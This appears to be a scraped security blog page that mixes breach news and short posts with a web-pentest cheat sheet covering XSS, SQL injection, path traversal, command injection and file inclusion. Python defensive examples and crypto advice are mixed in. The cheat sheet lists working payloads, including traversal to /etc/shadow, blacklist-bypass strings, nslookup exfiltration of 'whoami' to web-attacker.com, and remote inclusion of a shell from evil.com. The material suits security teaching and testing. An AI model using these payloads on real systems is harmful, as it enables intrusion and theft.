Details of 10.6 million MGM hotel guests posted on a hacking forum
Source: https://www.zdnet.com/article/exclusive-details-of-10-6-million-of-mgm-hotel-guests-posted-on-a-hacking-forum/
@yevhsec
It seems to me that some organizations are mistaken in stating that they have a full SDLC only when they are running a static analysis using something like Coverity.
Sometimes sqlmap shows that one of the parameters is vulnerable, but then you notice that you need to play with different tamper values to break through some kind of firewall, and of course, this is not always successful.
What do you think about the "12 word phrase" as a secure flow for password restoring? This third-party library is used by companies like blockchain.com, nash.io, and others. But what if I say that all validation occurs on the client side with informative errors for T and F statements and all possible phrases are stored in the JS file? My ticket on HackerOne was declined, apparently it is an absolutely secure flow for password restoring ;)
Sudo CVE-2019-18634 flaw allows Non-Privileged Linux and macOS Users run commands as Root
http://i.securitythinkingcap.com/RPK4pJ
Why do people deploy applications with dev mode turned on in production releases?
Penetration Testing Django and Rails
Here are the slides for the talk I gave last night at OWASP NY/NJ.
Pentesting Django and Rails (slides by levigross).
I reported this vulnerability almost half a year ago, but it has not been fixed yet.
VirusSecurityPatrouille
Cross Site Scripting
Types of XSS injections:
1) Stored - possible when a website or web application stores user input and later serves it to other users. An application is vulnerable if it does not validate user input before storing the content and embedding it into HTML response pages.
2) Reflected - the attacker's payload has to be part of the request that is sent to the web server. It is then reflected back in such a way that the HTTP response includes the payload from the HTTP request. Attackers use malicious links, phishing emails, and other social engineering techniques to lure the victim into making a request to the server.
3) DOM-based - possible if the web application's client-side scripts write data provided by the user to the Document Object Model (DOM). The data is subsequently read from the DOM by the web application and output to the browser. If the data is incorrectly handled, an attacker can inject a payload, which will be stored as part of the DOM and executed when the data is read back from the DOM.
4) Universal Cross-Site Scripting (UXSS) - unlike common XSS attacks, UXSS exploits client-side vulnerabilities in the browser or browser extensions to create an XSS condition and execute malicious code. When such vulnerabilities are found and exploited, the behavior of the browser is affected and its security features may be bypassed or disabled.
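As an added defensive illustration (not part of the original post), the vulnerable render beside its hardened form for the stored and reflected cases. The fix is the same for both: encode at output time, in the context the value lands in. For the DOM-based case the same encoding has to happen in the client-side script that writes to the DOM; server-side escaping cannot do it for that script.

```python
import html

# Constructed sample inputs: a stored guest comment and a reflected search term.
STORED_COMMENT = "Great stay! <script>alert(1)</script>"
SEARCH_TERM = '"><b>injected</b>'

def render_comment_unsafe(comment):
    # Stored XSS: the saved comment is concatenated straight into the HTML served to other
    # users, so any tags it contains become part of the page.
    return f'<p class="comment">{comment}</p>'

def render_comment_safe(comment):
    # Hardened: encode at output time for the HTML body context; & < > become entities and
    # can no longer open a tag. Input validation is a second layer, not a replacement for this.
    return f'<p class="comment">{html.escape(comment)}</p>'

def render_search_unsafe(term):
    # Reflected XSS: the request parameter is echoed inside an attribute of the same response.
    return f'<input name="q" value="{term}">'

def render_search_safe(term):
    # Attribute context: quote=True (the default) also encodes " and ', so the value cannot
    # close the attribute and start a new one or a new tag.
    return f'<input name="q" value="{html.escape(term, quote=True)}">'

def user_markup_survived(rendered, user_value):
    """True when the raw user value appears in the output unchanged, i.e. its tags are live."""
    return user_value in rendered
```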
Available for manipulation:
Cookie
DOM
Connectivity
Async JS requests
Toolset: Acunetix, w3af, BeEF
Basic payload:
Image payload:
HTML5 payload:
SQL injection
SQL injection is one of the most common code injection techniques; it aims at getting access to the database and is made possible by the application's improper handling of user input.
Related to:
Language: SQL
Platform: Any (requires interaction with a SQL database)
Types of SQL injection:
Error based
Boolean based blind
Time based blind
Toolset: sqlmap
Detection
Detection of Error based SQL injection:
'
"
#
;
)
Encoding:
%27
%22
%23
%3B
Multiple encoding:
%%2727
%%2222
%%2323
%%3B3B
Detection of Boolean based blind SQL injection:
TRUE statements:
aNd 1=1
aNd 21=21
anD 1=1;//
orDeR bY 1
FALSE statements:
aNd 0=1
anD 9=2
anD 57=276;//
ordEr bY 1000000000000
Characters to use instead of spaces:
+
/**/
%20
Comments to end the queries:
/*
//
#
%23
--
Detection of Time based blind:
aNd sleep
SLEEP(15)
BENCHMARK(100000000, rand())
WAITFOR DELAY '00:00:15'
WAITFOR TIME '00:00:15'
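From the detection side, the probe strings listed above are exactly what a log monitor should be looking for. This is an added example, not part of the original post: it decodes each request target repeatedly (so a double-encoded quote such as %2527 is seen as '), maps the space substitutes (+ and /**/) back to spaces, and then matches the boolean, ORDER BY and time-based families case-insensitively. The sample request lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample request targets, as they would appear in an access log (not real traffic).
SAMPLE_REQUESTS = [
    "/item?id=42",
    "/item?id=42%27%20aNd%201=1",                      # single-encoded boolean probe
    "/item?id=42%2527%20orDeR%20bY%201000000000000",   # double-encoded quote (%2527 -> %27 -> ')
    "/item?id=42'+and+sleep(15)--",                    # time-based probe, '+' used as the space
    "/item?id=42;WAITFOR%20DELAY%20'00:00:15'--",
    "/search?q=hello%20world",
]

# One alternative per detection family above; IGNORECASE so aNd / orDeR still match.
PATTERNS = [
    r"\b(?:and|or)\s+\d+\s*=\s*\d+",      # and 1=1, and 9=2
    r"\border\s+by\s+\d+",                 # order by 1, order by 1000000000000
    r"\bsleep\s*\(\s*\d+",                 # sleep(15)
    r"\bbenchmark\s*\(",                   # benchmark(100000000, rand())
    r"\bwaitfor\s+(?:delay|time)\b",       # waitfor delay '00:00:15'
]
DETECTOR = re.compile("|".join(PATTERNS), re.IGNORECASE)

def normalise(target, max_rounds=3):
    """Undo repeated percent-encoding and map the space substitutes (+, /**/) back to spaces."""
    current = target
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:      # nothing left to decode
            break
        current = decoded
    return current.replace("+", " ").replace("/**/", " ")

def flag_sqli(target):
    """Return the matched probe text, or None when the request looks clean."""
    match = DETECTOR.search(normalise(target))
    return match.group(0) if match else None

def scan(targets):
    """(target, matched text) for every request that trips the detector."""
    hits = []
    for target in targets:
        matched = flag_sqli(target)
        if matched:
            hits.append((target, matched))
    return hits
```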
Exploitation
General select syntax:
Notes:
When executing queries you need to consider encodings.
Example of forcing utf8 in a query (via COLLATE):
UniOn select table_name COLLATE utf8_general_ci,table_schema COLLATE utf8_general_ci,'1' from information_schema.tables
sqlmap
Path traversal
A directory traversal (or path traversal) attack consists of exploiting insufficient validation / sanitization of user-supplied input file names, such that characters representing "traverse to parent directory" are passed through to the file APIs.
Where to detect?
Check dynamic URL:
https://yevh.ye/img/loadImage?filename=ye.jpj
Check page elements:
<img src="/loadImage?filename=ye.jpj">
Basic checks:
..
../
..\
..../
....\/
....//
....\\
Encoding:
..%c0%af
..%252f
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
Expected base folder:
/var/www/images/../../../etc/passwd
Expected file extension:
/var/www/images/../../../etc/passwd%00.jpj
Popular server paths:
/var/www/ - Apache
/etc/nginx/ - NGINX
Linux interesting files:
/etc/passwd
/etc/shadow
/proc/self/environ
/etc/mysql/my.cnf
/proc/net/route
Windows interesting files:
\windows\win.ini
\inetpub\logs\logfiles
\Users\Administrator\NTUser.dat
\Administrator\NTUser.dat
\apache\logs\access.log
\apache\logs\error.log
\apache\php\php.ini
References
OWASP
Command Injection
OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data.
Useful commands:
Linux:
whoami --- Name of current user.
uname -a --- Operating system.
ifconfig --- Network configuration.
netstat -an --- Network connections.
ps -ef --- Running processes.
Windows:
whoami --- Name of current user.
ver --- Operating system.
ipconfig /all --- Network configuration.
netstat -an --- Network connections.
tasklist --- Running processes.
Basic payloads:
Note: VC = valid_command
VC ;ls --- Execute ls after VC
VC | ls --- Sends the output of VC as input to ls
VC || ls --- Executes ls only if VC returns a nonzero exit status (error)
VC $(ls) --- Sends the output of ls as arguments to VC
VC `ls` --- Sends the output of ls as arguments to VC
VC && ls --- Executes ls after VC only if VC returns 0
Bypass Blacklisted words:
w'h'o'am'i
w"h"o"am"I
w\ho\am\i
/\b\i\n/////s\h
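The defensive counterpart to the basic payloads and the blacklist-bypass tricks above, added here as an example (not the original post's code): a ping helper in its vulnerable shell-string form next to the hardened form. The hardened version allowlists the host and passes an argv list to subprocess without a shell, so the metacharacters in the payload list and the quote/backslash tricks that dodge blacklists have nothing to act on. The sample inputs are constructed.

```python
import re
import subprocess

# Allowlist for a hostname or IPv4 literal: letters, digits, '.', '-', no leading '-'
# (which could be parsed as an option). None of the shell metacharacters from the payloads
# above (; | || $() `` &&) nor the quoting tricks used against blacklists (' " \) can pass,
# so this allowlist replaces any blacklist of words.
HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")

# Constructed sample inputs: one benign host followed by the injection shapes listed above.
SAMPLES = [
    "127.0.0.1",
    "127.0.0.1;ls",
    "127.0.0.1 | ls",
    "127.0.0.1 || ls",
    "127.0.0.1 $(ls)",
    "127.0.0.1 `ls`",
    "127.0.0.1 && ls",
    "-c 100000 127.0.0.1",
]

def build_ping_unsafe(host):
    # Vulnerable pattern: the value is spliced into a command string meant for
    # subprocess.run(..., shell=True), so the shell interprets every metacharacter it contains.
    return f"ping -c 1 {host}"

def validate_host(host):
    return HOST_RE.fullmatch(host) is not None

def build_ping_safe(host):
    # Hardened: allowlist first, then an argv list run without a shell (shell=False is the
    # default), so the host is one literal argument whatever it contains.
    if not validate_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", host]

def run_ping(host):
    return subprocess.run(build_ping_safe(host), capture_output=True, text=True, timeout=10)

def triage(values):
    """Split inputs into accepted hosts and rejected ones (the latter are worth logging as probes)."""
    accepted = [v for v in values if validate_host(v)]
    rejected = [v for v in values if not validate_host(v)]
    return accepted, rejected
```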
Blind command injection payloads:
& ping -c 10 127.0.0.1 &
& whoami > /var/www/static/whoami.txt &
& nslookup kgji2ohoyw.web-attacker.com &
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
References:
OWASP
File Inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually by exploiting a "dynamic file inclusion" mechanism implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
Can lead to:
Code execution on the web server.
Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting.
Denial of Service (DoS).
Sensitive Information Disclosure.
Types:
Local File Inclusion (LFI) - the process of including files that are already present locally on the server, by exploiting vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives as input the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected.
Remote File Inclusion (RFI) - occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI passed as a user-supplied parameter to the web application.
Basic payloads LFI:
http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
Basic payloads RFI:
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
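One containment check covers both the path traversal section (the loadImage?filename= case with its encoded, null-byte and absolute-path variants) and the LFI/RFI payloads just above. This is an added example, not code from the original post; the two base directories are assumed. The path is fully decoded first, rejected if it carries a null byte, invalid UTF-8 (the ..%c0%af family) or a URL scheme, and then canonicalised and checked to still sit inside the base directory.

```python
import os
from urllib.parse import unquote

# Assumed roots for the two cases on this page: the image loader and the ?page= include.
IMAGE_DIR = "/var/www/images"
PAGE_DIR = "/var/www/html/pages"

def decode_fully(value, max_rounds=3):
    """Undo single and double percent-encoding (%2e%2e%2f, %252e%252e%252f)."""
    current = value
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current

def resolve_under(base_dir, user_path, allowed_ext):
    """Absolute path inside base_dir for user_path, or None when the request must be rejected."""
    decoded = decode_fully(user_path)
    if "\x00" in decoded:          # passwd%00.jpg: null byte used to defeat an extension check
        return None
    if "\ufffd" in decoded:        # ..%c0%af and other invalid UTF-8 come out of unquote() as U+FFFD
        return None
    if "://" in decoded:           # http://evil.com/shell.txt: an include must never fetch a URL
        return None
    if not decoded.lower().endswith(allowed_ext):   # check the extension after decoding, not before
        return None
    # os.path.join() drops base_dir when decoded is absolute and normpath() collapses ../, so
    # the containment check below is the real control. On a live filesystem use
    # os.path.realpath() instead of normpath() so symlinks are resolved as well.
    candidate = os.path.normpath(os.path.join(base_dir, decoded))
    if os.path.commonpath([base_dir, candidate]) != base_dir:
        return None
    return candidate

def resolve_image(filename):
    return resolve_under(IMAGE_DIR, filename, (".jpg", ".png", ".gif"))

def resolve_page(page):
    return resolve_under(PAGE_DIR, page, (".php",))
```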
References
OWASP
Cryptographic recommendations
This sheet presents cryptographic recommendations and libraries to use.
Recommendations:
Key exchange: Diffie–Hellman key exchange with minimum 2048 bits
Message Integrity: HMAC-SHA2
Message Hash: SHA2 256 bits
Asymmetric encryption: RSA 2048 bits
Symmetric-key algorithm: AES 128 bits
Password Hashing: Argon2, PBKDF2, Scrypt, Bcrypt
Recommended libraries:
Python: MbedTLS, Libsodium, PyNaCl, Libnacl.
Ruby: Nacl, djb's.
JS: Crypto-js.
Go: Crypto.
Java: java.security, javax.crypto.
PHP: Hash, OpenSSL.
C/C++: OpenSSL.
Do not use:
C: random(), rand() ----> getrandom(2)
Java: java.util.Random() ----> java.security.SecureRandom
PHP: rand() or mt_rand() ----> random_int() or random_bytes()
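Two of the recommendations above (password hashing with PBKDF2 and message integrity with HMAC-SHA2) worked through in Python's standard library, as an added example that is not part of the original sheet. The salt comes from secrets (the CSPRNG replacement for the random() family in the "do not use" list), the record stores its own rounds and salt so the work factor can be raised later, and both comparisons are constant-time. The round count is an assumed value.

```python
import base64
import hashlib
import hmac
import secrets

PBKDF2_ROUNDS = 600_000   # assumed work factor; tune so one hash costs roughly 100 ms on your servers
SALT_BYTES = 16

def b64(raw):
    return base64.b64encode(raw).decode("ascii")   # never contains '$', so '$' is a safe separator

def hash_password(password, rounds=PBKDF2_ROUNDS, salt=None):
    """Return a self-describing record: pbkdf2_sha256$<rounds>$<salt b64>$<digest b64>."""
    if salt is None:
        salt = secrets.token_bytes(SALT_BYTES)     # CSPRNG: secrets, never random.random()
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds, dklen=32)
    return "pbkdf2_sha256${}${}${}".format(rounds, b64(salt), b64(digest))

def verify_password(password, record):
    """Recompute with the stored salt and rounds; compare in constant time."""
    try:
        scheme, rounds, salt_b64, digest_b64 = record.split("$")
        salt, expected = base64.b64decode(salt_b64), base64.b64decode(digest_b64)
        rounds = int(rounds)
    except ValueError:                              # malformed record: treat as a failed login
        return False
    if scheme != "pbkdf2_sha256":
        return False
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds, dklen=len(expected))
    return hmac.compare_digest(actual, expected)    # no early exit on the first differing byte

def needs_rehash(record, rounds=PBKDF2_ROUNDS):
    """True when the stored record is weaker than current policy, so it can be upgraded at login."""
    parts = record.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256" or not parts[1].isdigit():
        return True
    return int(parts[1]) < rounds

def tag_message(key, message):
    """HMAC-SHA256 tag for message integrity (the HMAC-SHA2 recommendation above)."""
    return hmac.new(key, message, "sha256").hexdigest()

def check_tag(key, message, tag):
    return hmac.compare_digest(tag_message(key, message), tag)
```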
References:
OWASP Guide to Cryptography
Mozilla TLS wiki